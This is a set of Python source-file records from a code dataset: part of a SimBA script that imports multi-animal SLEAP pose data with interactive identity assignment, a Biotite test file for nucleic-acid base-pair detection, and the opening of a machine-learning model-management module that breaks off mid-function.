cv2.putText(overlay, 
str(currID), (centerX, centerY), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 0), 5)\r\n currIDcounter += 1\r\n\r\ncmap, colorList = cm.get_cmap(str('tab10'), animalsNo + 1), []\r\nfor i in range(cmap.N):\r\n rgb = list((cmap(i)[:3]))\r\n rgb = [i * 255 for i in rgb]\r\n rgb.reverse()\r\n colorList.append(rgb)\r\n\r\nfor csvFile in csvPaths:\r\n indBpCordList, frameNumber, addSpacer, EuclidDistanceList, changeList = [], 0, 2, [], []\r\n ID_user_cords, currIDcounter = [], 0\r\n assigningIDs, completePromt, chooseFrame, assignBpCords = False, False, True, True\r\n currDf = simba.rw_dfs.read_df(csvFile, wfileType)\r\n vidFname = os.path.join(videoFolder, os.path.basename(csvFile).replace('.csv', '.mp4'))\r\n vidBasename = os.path.basename(vidFname)\r\n if not os.path.exists(vidFname):\r\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), vidFname)\r\n cap = cv2.VideoCapture(vidFname)\r\n if not cap.isOpened():\r\n raise Exception('Can\'t open video file ' + vidFname)\r\n width, height = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n mySpaceScale, myRadius, myResolution, myFontScale = 40, 10, 1500, 1.2\r\n maxResDimension = max(width, height)\r\n circleScale, fontScale, spacingScale = int(myRadius / (myResolution / maxResDimension)), float(myFontScale / (myResolution / maxResDimension)), int(mySpaceScale / (myResolution / maxResDimension))\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n\r\n while (1):\r\n if (chooseFrame == True) and (assignBpCords == True):\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n cap.set(1, frameNumber)\r\n ret, frame = cap.read()\r\n if not ret:\r\n raise Exception('Can\'t read video file ' + vidFname)\r\n overlay = frame.copy()\r\n for animal_bps in range(len(bpNameListGrouped)):\r\n currCols = bpNameListGrouped[animal_bps]\r\n currcolor = tuple(colorList[animal_bps])\r\n x_cord = currDf.at[frameNumber, currCols[0]]\r\n y_cord = currDf.at[frameNumber, currCols[1]]\r\n indBpCordList.append([x_cord, y_cord, currCols[2]])\r\n cv2.circle(overlay, (int(x_cord), int(y_cord)), circleScale, currcolor, -1, lineType=cv2.LINE_AA)\r\n for loop, name in enumerate(indBpCordList):\r\n currstring = name[2]\r\n for substring in bp_cord_names:\r\n if substring in currstring:\r\n newstring = currstring.replace(substring, '')\r\n indBpCordList[loop][2] = newstring\r\n imWithCordsOnly = overlay.copy()\r\n chooseFrame = False\r\n if (chooseFrame == False) and (assignBpCords == True):\r\n sideImage = np.ones((int(height / 2), width, 3))\r\n cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)),cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Can you assign identities based on the displayed frame ?', (10, int(spacingScale * (addSpacer * 2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Press \"x\" to display new, random, frame', (10, int(spacingScale * (addSpacer * 3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n cv2.putText(sideImage, 'Press \"c\" to continue to start assigning identities using this frame', (10, int(spacingScale * (addSpacer * 4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 255), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n k = cv2.waitKey(10)\r\n if k == ord('x'):\r\n cv2.destroyWindow('Define animal IDs')\r\n chooseFrame, assignBpCords = True, True\r\n 
frameNumber += 50\r\n elif k == ord('c'):\r\n chooseFrame, assignBpCords = False, False\r\n assigningIDs, completePromt = True, False\r\n\r\n if assigningIDs == True:\r\n sideImage = np.ones((int(height / 2), width, 3))\r\n cv2.putText(sideImage, 'Double left mouse click on:', (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, str(currIDList[currIDcounter]), (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.setMouseCallback('Define animal IDs', define_ID)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n cv2.waitKey(10)\r\n if currIDcounter >= len(currIDList):\r\n cv2.destroyWindow('Define animal IDs')\r\n assigningIDs, completePromt = False, True\r\n\r\n if completePromt == True:\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n sideImage = np.ones((int(height/2), width, 3))\r\n cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Are you happy with your assigned identities ?', (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3)\r\n cv2.putText(sideImage, 'Press \"c\" to continue (to finish, or proceed to the next video)', (10, int(spacingScale * (addSpacer*3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3)\r\n cv2.putText(sideImage, 'Press \"x\" to re-start assigning identities', (10, int(spacingScale * (addSpacer*4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 255), 3)\r\n imageConcat = np.concatenate((overlay, sideImage), axis=0)\r\n imageConcat = np.uint8(imageConcat)\r\n cv2.imshow('Define animal IDs', imageConcat)\r\n k = cv2.waitKey(10)\r\n if k == ord('c'):\r\n cv2.destroyWindow('Define animal IDs')\r\n break\r\n if k == ord('x'):\r\n overlay = imWithCordsOnly.copy()\r\n ID_user_cords, currIDcounter = [], 0\r\n assigningIDs, completePromt = True, False\r\n\r\n print('Re-organizing pose data-frame based on user-assigned identities: ' + str(os.path.basename(vidFname)) + '....')\r\n\r\n for values in ID_user_cords:\r\n currClickedX, currClickedY, currClickedID = values[0], values[1], values[2]\r\n for bpCords in indBpCordList:\r\n currX, currY, ID = bpCords[0], bpCords[1], bpCords[2]\r\n currEuclidian = np.sqrt((currClickedX - currX) ** 2 + (currClickedY - currY) ** 2)\r\n EuclidDistanceList.append([currEuclidian, currClickedID, ID])\r\n euclidDf = pd.DataFrame(EuclidDistanceList)\r\n euclidDf.columns = ['Distance', 'clickID', 'pose_ID']\r\n for i in currIDList:\r\n minDistance = euclidDf.loc[euclidDf['clickID'] == i, 'Distance'].min()\r\n animalPoseID = euclidDf.loc[euclidDf['Distance'] == minDistance, 'pose_ID'].iloc[0]\r\n changeList.append([animalPoseID, i])\r\n for animal in changeList:\r\n currPoseName, newName = animal[0], animal[1]\r\n loop = 0\r\n for header in bpNameList:\r\n if header.startswith(currPoseName):\r\n newHeader = header.replace(currPoseName, newName)\r\n bpNameList[loop] = newHeader\r\n loop += 1\r\n currDf.columns = bpNameList\r\n outDf = pd.DataFrame()\r\n for name in currIDList:\r\n currCols = [col for col in currDf.columns if name in col]\r\n sliceDf = currDf[currCols]\r\n outDf = pd.concat([outDf, sliceDf], axis=1)\r\n outDfcols = list(outDf.columns)\r\n toBpCSVlist = []\r\n if poseEstimationSetting == 'user_defined':\r\n for i in 
outDfcols:\r\n currBpName = i[:-2]\r\n for identityNo in range(len(currIDList)):\r\n if str(currIDList[identityNo]) in currBpName:\r\n currBpName = currBpName + '_' + str(identityNo+1)\r\n if currBpName not in toBpCSVlist:\r\n toBpCSVlist.append(currBpName)\r\n f = open(bpNamesCSVPath, 'w+')\r\n for i in toBpCSVlist:\r\n f.write(i + '\\n')\r\n f.close()\r\n MultiIndexCol = []\r\n\r\n for column in range(len(outDf.columns)):\r\n MultiIndexCol.append(tuple(('SLEAP_multi', 'SLEAP_multi', outDf.columns[column])))\r\n outDf.columns = pd.MultiIndex.from_tuples(MultiIndexCol, names=['scorer', 'bodypart', 'coords'])\r\n outputCSVname = os.path.basename(vidFname).replace('.mp4', '.csv')\r\n outDf.to_csv(os.path.join(outputDfFolder, outputCSVname))\r\n print('Imported ', outputCSVname, 'to project.')\r\nprint('All multi-animal SLEAP .h5 tracking files ordered and imported into SimBA project in CSV file format')\r\n\r\n\r\n", "sub_path": "simba/import_sleap_h5.py", "file_name": "import_sleap_h5.py", "file_ext": "py", "file_size_in_byte": 13373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "configparser.MissingSectionHeaderError", "line_number": 23, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "configparser.NoOptionError", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 65, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs.save_df", "line_number": 85, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs", "line_number": 85, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs", "line_number": 85, "usage_type": "name"}, {"api_name": "cv2.EVENT_LBUTTONDBLCLK", "line_number": 94, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 97, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs.rw_dfs.read_df", "line_number": 111, "usage_type": "call"}, {"api_name": "simba.rw_dfs.rw_dfs", "line_number": 111, "usage_type": "attribute"}, {"api_name": "simba.rw_dfs", "line_number": 111, 
"usage_type": "name"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "errno.ENOENT", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.strerror", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 119, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 127, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 127, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 152, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 155, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 157, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 168, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.setMouseCallback", "line_number": 172, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 176, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 181, "usage_type": "call"}, {"api_name": 
"cv2.putText", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 182, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 183, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 189, "usage_type": "call"}, {"api_name": "cv2.destroyWindow", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 221, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_tuples", "line_number": 244, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}]} +{"seq_id": "455250999", "text": "# This source code is part of the Biotite package and is distributed\n# under the 3-Clause BSD License. 
Please see 'LICENSE.rst' for further\n# information.\n\nimport pytest\nimport numpy as np\nimport biotite.structure as struc\nimport biotite.structure.io as strucio\nfrom biotite.structure.basepairs import base_pairs\nfrom os.path import join\nfrom ..util import data_dir\n\n\ndef reversed_iterator(iter):\n \"\"\"\n Returns a reversed list of the elements of an Iterator.\n \"\"\"\n return reversed(list(iter))\n\n\n@pytest.fixture\ndef nuc_sample_array():\n return strucio.load_structure(join(data_dir(\"structure\"), \"1qxb.cif\"))\n\n@pytest.fixture\ndef basepairs(nuc_sample_array):\n \"\"\"\n Generate a test output for the base_pairs function.\n \"\"\"\n residue_indices, residue_names = struc.residues.get_residues(\n nuc_sample_array\n )[0:24]\n return np.vstack((residue_indices[:12], np.flip(residue_indices)[:12])).T\n\n\ndef check_output(computed_basepairs, basepairs):\n \"\"\"\n Check the output of base_pairs.\n \"\"\"\n\n # Check if basepairs are unique in computed_basepairs\n seen = set()\n assert (not any(\n (base1, base2) in seen) or (base2, base1 in seen)\n or seen.add((base1, base2)) for base1, base2 in computed_basepairs\n )\n # Check if the right number of basepairs is in computed_basepairs\n assert(len(computed_basepairs) == len(basepairs))\n # Check if the right basepairs are in computed_basepairs\n for comp_basepair in computed_basepairs:\n assert ((comp_basepair in basepairs) \\\n or (comp_basepair in np.flip(basepairs)))\n\n@pytest.mark.parametrize(\"unique_bool\", [False, True])\ndef test_base_pairs_forward(nuc_sample_array, basepairs, unique_bool):\n \"\"\"\n Test for the function base_pairs.\n \"\"\"\n computed_basepairs = base_pairs(nuc_sample_array, unique=unique_bool)\n check_output(nuc_sample_array[computed_basepairs].res_id, basepairs)\n\n\ndef test_base_pairs_forward_no_hydrogen(nuc_sample_array, basepairs):\n \"\"\"\n Test for the function base_pairs with the hydrogens removed from the\n test structure.\n \"\"\"\n nuc_sample_array = nuc_sample_array[nuc_sample_array.element != \"H\"]\n computed_basepairs = base_pairs(nuc_sample_array)\n check_output(nuc_sample_array[computed_basepairs].res_id, basepairs)\n\n@pytest.mark.parametrize(\"unique_bool\", [False, True])\ndef test_base_pairs_reverse(nuc_sample_array, basepairs, unique_bool):\n \"\"\"\n Reverse the order of residues in the atom_array and then test the\n function base_pairs.\n \"\"\"\n \n # Reverse sequence of residues in nuc_sample_array\n reversed_nuc_sample_array = struc.AtomArray(0) \n for residue in reversed_iterator(struc.residue_iter(nuc_sample_array)):\n reversed_nuc_sample_array = reversed_nuc_sample_array + residue\n \n computed_basepairs = base_pairs(\n reversed_nuc_sample_array, unique=unique_bool\n )\n check_output(\n reversed_nuc_sample_array[computed_basepairs].res_id, basepairs\n )\n\ndef test_base_pairs_reverse_no_hydrogen(nuc_sample_array, basepairs):\n \"\"\"\n Remove the hydrogens from the sample structure. 
Then reverse the \n order of residues in the atom_array and then test the function \n base_pairs.\n \"\"\"\n nuc_sample_array = nuc_sample_array[nuc_sample_array.element != \"H\"]\n # Reverse sequence of residues in nuc_sample_array\n reversed_nuc_sample_array = struc.AtomArray(0) \n for residue in reversed_iterator(struc.residue_iter(nuc_sample_array)):\n reversed_nuc_sample_array = reversed_nuc_sample_array + residue\n \n computed_basepairs = base_pairs(reversed_nuc_sample_array)\n check_output(\n reversed_nuc_sample_array[computed_basepairs].res_id, basepairs\n )\n", "sub_path": "tests/structure/test_basepairs.py", "file_name": "test_basepairs.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "biotite.structure.io.load_structure", "line_number": 23, "usage_type": "call"}, {"api_name": "biotite.structure.io", "line_number": 23, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "util.data_dir", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 21, "usage_type": "attribute"}, {"api_name": "biotite.structure.residues.get_residues", "line_number": 30, "usage_type": "call"}, {"api_name": "biotite.structure.residues", "line_number": 30, "usage_type": "attribute"}, {"api_name": "biotite.structure", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.flip", "line_number": 52, "usage_type": "call"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 59, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 54, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 54, "usage_type": "attribute"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 69, "usage_type": "call"}, {"api_name": "biotite.structure.AtomArray", "line_number": 80, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 80, "usage_type": "name"}, {"api_name": "biotite.structure.residue_iter", "line_number": 81, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 81, "usage_type": "name"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 84, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "biotite.structure.AtomArray", "line_number": 99, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 99, "usage_type": "name"}, {"api_name": "biotite.structure.residue_iter", "line_number": 100, "usage_type": "call"}, {"api_name": "biotite.structure", "line_number": 100, "usage_type": "name"}, {"api_name": "biotite.structure.basepairs.base_pairs", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "317310942", "text": "import abc\nimport os\nimport tarfile\nimport zipfile\nfrom tempfile import mkdtemp, mkstemp\n\nimport pyparsing\nimport six\nfrom typing import List, Dict, Union, Optional, TYPE_CHECKING, Sequence\n\nfrom .backend_api import Session\nfrom .backend_api.services import models\nfrom pathlib2 import Path\nfrom .utilities.pyhocon import ConfigFactory, HOCONConverter\n\nfrom .backend_interface.util 
import validate_dict, get_single_result, mutually_exclusive\nfrom .debugging.log import get_logger\nfrom .storage.helper import StorageHelper\nfrom .utilities.enum import Options\nfrom .backend_interface import Task as _Task\nfrom .backend_interface.model import create_dummy_model, Model as _Model\nfrom .config import running_remotely, get_cache_dir\n\n\nif TYPE_CHECKING:\n from .task import Task\n\nARCHIVED_TAG = \"archived\"\n\n\nclass Framework(Options):\n \"\"\"\n Optional frameworks for output model\n \"\"\"\n tensorflow = 'TensorFlow'\n tensorflowjs = 'TensorFlow_js'\n tensorflowlite = 'TensorFlow_Lite'\n pytorch = 'PyTorch'\n caffe = 'Caffe'\n caffe2 = 'Caffe2'\n onnx = 'ONNX'\n keras = 'Keras'\n mknet = 'MXNet'\n cntk = 'CNTK'\n torch = 'Torch'\n darknet = 'Darknet'\n paddlepaddle = 'PaddlePaddle'\n scikitlearn = 'ScikitLearn'\n xgboost = 'XGBoost'\n parquet = 'Parquet'\n\n __file_extensions_mapping = {\n '.pb': (tensorflow, tensorflowjs, onnx, ),\n '.meta': (tensorflow, ),\n '.pbtxt': (tensorflow, onnx, ),\n '.zip': (tensorflow, ),\n '.tgz': (tensorflow, ),\n '.tar.gz': (tensorflow, ),\n 'model.json': (tensorflowjs, ),\n '.tflite': (tensorflowlite, ),\n '.pth': (pytorch, ),\n '.pt': (pytorch, ),\n '.caffemodel': (caffe, ),\n '.prototxt': (caffe, ),\n 'predict_net.pb': (caffe2, ),\n 'predict_net.pbtxt': (caffe2, ),\n '.onnx': (onnx, ),\n '.h5': (keras, ),\n '.hdf5': (keras, ),\n '.keras': (keras, ),\n '.model': (mknet, cntk, xgboost),\n '-symbol.json': (mknet, ),\n '.cntk': (cntk, ),\n '.t7': (torch, ),\n '.cfg': (darknet, ),\n '__model__': (paddlepaddle, ),\n '.pkl': (scikitlearn, keras, xgboost),\n '.parquet': (parquet, ),\n }\n\n @classmethod\n def _get_file_ext(cls, framework, filename):\n mapping = cls.__file_extensions_mapping\n filename = filename.lower()\n\n def find_framework_by_ext(framework_selector):\n for ext, frameworks in mapping.items():\n if frameworks and filename.endswith(ext):\n fw = framework_selector(frameworks)\n if fw:\n return (fw, ext)\n\n # If no framework, try finding the first framework matching the extension, otherwise (or if no match) try\n # matching the given extension to the given framework. If no match, return an empty extension\n return (\n (not framework and find_framework_by_ext(lambda frameworks_: frameworks_[0]))\n or find_framework_by_ext(lambda frameworks_: framework if framework in frameworks_ else None)\n or (framework, filename.split('.')[-1] if '.' in filename else '')\n )\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass BaseModel(object):\n _package_tag = \"package\"\n\n @property\n def id(self):\n # type: () -> str\n \"\"\"\n The Id (system UUID) of the model.\n\n :return str: The model id.\n \"\"\"\n return self._get_model_data().id\n\n @property\n def name(self):\n # type: () -> str\n \"\"\"\n The name of the model.\n\n :return str: The model name.\n \"\"\"\n return self._get_model_data().name\n\n @name.setter\n def name(self, value):\n # type: (str) -> None\n \"\"\"\n Set the model name.\n\n :param str value: The model name.\n \"\"\"\n self._get_base_model().update(name=value)\n\n @property\n def comment(self):\n # type: () -> str\n \"\"\"\n The comment for the model. Also used as a model description.\n\n :return str: The model comment / description.\n \"\"\"\n return self._get_model_data().comment\n\n @comment.setter\n def comment(self, value):\n # type: (str) -> None\n \"\"\"\n Set the comment for the model. 
Also used as a model description.\n\n :param str value: The model comment/description.\n \"\"\"\n self._get_base_model().update(comment=value)\n\n @property\n def tags(self):\n # type: () -> List[str]\n \"\"\"\n A list of tags describing the model.\n\n :return list(str): The list of tags.\n \"\"\"\n return self._get_model_data().tags\n\n @tags.setter\n def tags(self, value):\n # type: (List[str]) -> None\n \"\"\"\n Set the list of tags describing the model.\n\n :param value: The tags.\n\n :type value: list(str)\n \"\"\"\n self._get_base_model().update(tags=value)\n\n @property\n def config_text(self):\n # type: () -> str\n \"\"\"\n The configuration as a string. For example, prototxt, an ini file, or Python code to evaluate.\n\n :return str: The configuration.\n \"\"\"\n return _Model._unwrap_design(self._get_model_data().design)\n\n @property\n def config_dict(self):\n # type: () -> dict\n \"\"\"\n The configuration as a dictionary, parsed from the design text. This usually represents the model configuration.\n For example, prototxt, an ini file, or Python code to evaluate.\n\n :return dict: The configuration.\n \"\"\"\n return self._text_to_config_dict(self.config_text)\n\n @property\n def labels(self):\n # type: () -> Dict[str, int]\n \"\"\"\n The label enumeration of string (label) to integer (value) pairs.\n\n\n :return dict: A dictionary containing the label enumeration, where the keys are labels and the values are integers.\n \"\"\"\n return self._get_model_data().labels\n\n @property\n def task(self):\n # type: () -> str\n \"\"\"\n Return the creating task id (str)\n\n :return str: Task ID\n \"\"\"\n return self._task or self._get_base_model().task\n\n @property\n def url(self):\n # type: () -> str\n \"\"\"\n Return the url of the model file (or archived files)\n\n :return str: Model file URL\n \"\"\"\n return self._get_base_model().uri\n\n @property\n def published(self):\n # type: () -> bool\n return self._get_base_model().locked\n\n @property\n def framework(self):\n # type: () -> str\n return self._get_model_data().framework\n\n def __init__(self, task=None):\n # type: (Task) -> None\n super(BaseModel, self).__init__()\n self._log = get_logger()\n self._task = None\n self._set_task(task)\n\n def get_weights(self, raise_on_error=False):\n # type: (bool) -> str\n \"\"\"\n Download the base model and return the locally stored filename.\n\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n\n :return str: The locally stored file.\n \"\"\"\n # download model (synchronously) and return local file\n return self._get_base_model().download_model_weights(raise_on_error=raise_on_error)\n\n def get_weights_package(self, return_path=False, raise_on_error=False):\n # type: (bool, bool) -> Union[str, List[Path]]\n \"\"\"\n Download the base model package into a temporary directory (extract the files), or return a list of the\n locally stored filenames.\n\n :param bool return_path: Return the temporary directory path instead of a list of filenames? (Optional)\n\n - ``True`` - Download the model weights into a temporary directory, and return the temporary directory path.\n - ``False`` - Return a list of the locally stored filenames. 
(Default)\n\n :param bool raise_on_error: If True and the artifact could not be downloaded,\n raise ValueError, otherwise return None on failure and output log warning.\n\n :return: The model weights, or a list of the locally stored filenames.\n \"\"\"\n # check if model was packaged\n if self._package_tag not in self._get_model_data().tags:\n raise ValueError('Model is not packaged')\n\n # download packaged model\n packed_file = self.get_weights(raise_on_error=raise_on_error)\n\n # unpack\n target_folder = mkdtemp(prefix='model_package_')\n if not target_folder:\n raise ValueError('cannot create temporary directory for packed weight files')\n\n for func in (zipfile.ZipFile, tarfile.open):\n try:\n obj = func(packed_file)\n obj.extractall(path=target_folder)\n break\n except (zipfile.BadZipfile, tarfile.ReadError):\n pass\n else:\n raise ValueError('cannot extract files from packaged model at %s' % packed_file)\n\n if return_path:\n return target_folder\n\n target_files = list(Path(target_folder).glob('*'))\n return target_files\n\n def publish(self):\n # type: () -> ()\n \"\"\"\n Set the model status to ``published``, making it available for public use. If the model's status is already\n ``published``, then this method is a no-op.\n \"\"\"\n\n if not self.published:\n self._get_base_model().publish()\n\n def _running_remotely(self):\n # type: () -> bool\n return bool(running_remotely() and self._task is not None)\n\n def _set_task(self, value):\n # type: (_Task) -> ()\n if value is not None and not isinstance(value, _Task):\n raise ValueError('task argument must be of Task type')\n self._task = value\n\n @abc.abstractmethod\n def _get_model_data(self):\n pass\n\n @abc.abstractmethod\n def _get_base_model(self):\n pass\n\n def _set_package_tag(self):\n if self._package_tag not in self.tags:\n self.tags.append(self._package_tag)\n self._get_base_model().edit(tags=self.tags)\n\n @staticmethod\n def _config_dict_to_text(config):\n # if already a string, return as is\n if isinstance(config, six.string_types):\n return 